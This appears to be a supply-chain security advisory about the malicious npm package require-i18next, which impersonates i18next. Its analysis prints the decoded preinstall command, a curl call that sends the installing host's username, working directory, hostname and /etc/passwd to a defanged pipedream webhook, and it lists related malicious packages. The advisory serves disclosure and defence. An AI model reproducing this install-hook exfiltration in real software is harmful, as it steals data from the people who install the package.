require-i18next@20.0.0
Malicious code in require-i18next (npm)
T1195.002 · Compromise Software Supply ChainT1059.007 · JavaScriptT1082 · System Information DiscoveryT1005 · Data from Local SystemT1041 · Exfiltration Over C2 Channel
Analysis
The preinstall hook (node preinstall.js) reads a hex-encoded command from a bundled preinstall.json, decodes it, and executes it with child_process.exec. The decoded command runs `curl hxxps://eobdzec83knbura[.]m[.]pipedream[.]net -d "whoami=`whoami`&pwd=`pwd`&hostname=`hostname`&passwd=`cat /etc/passwd`"`, POSTing the host's username, working directory, hostname, and the contents of /etc/passwd to a remote pipedream[.]net webhook endpoint during installation. The package name impersonates the legitimate i18next library.
- analyzed by
- Leitwacht
- first seen
- Aug 15, 2026, 01:10 PM
- analyzed
- Aug 15, 2026, 01:11 PM
Related advisories
- @openrepl/shared@0.0.4
- hunterone-build-probe-9210@1.0.0
- alelo-common@99.0.0
- debug-proxy-chrome-devtools@1.0.2
- verify-cli@99.0.0
- developer-dashboard@1.0.2
- passkeys-react@1.0.1
- camelot-ammv2-periphery@1.0.0
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.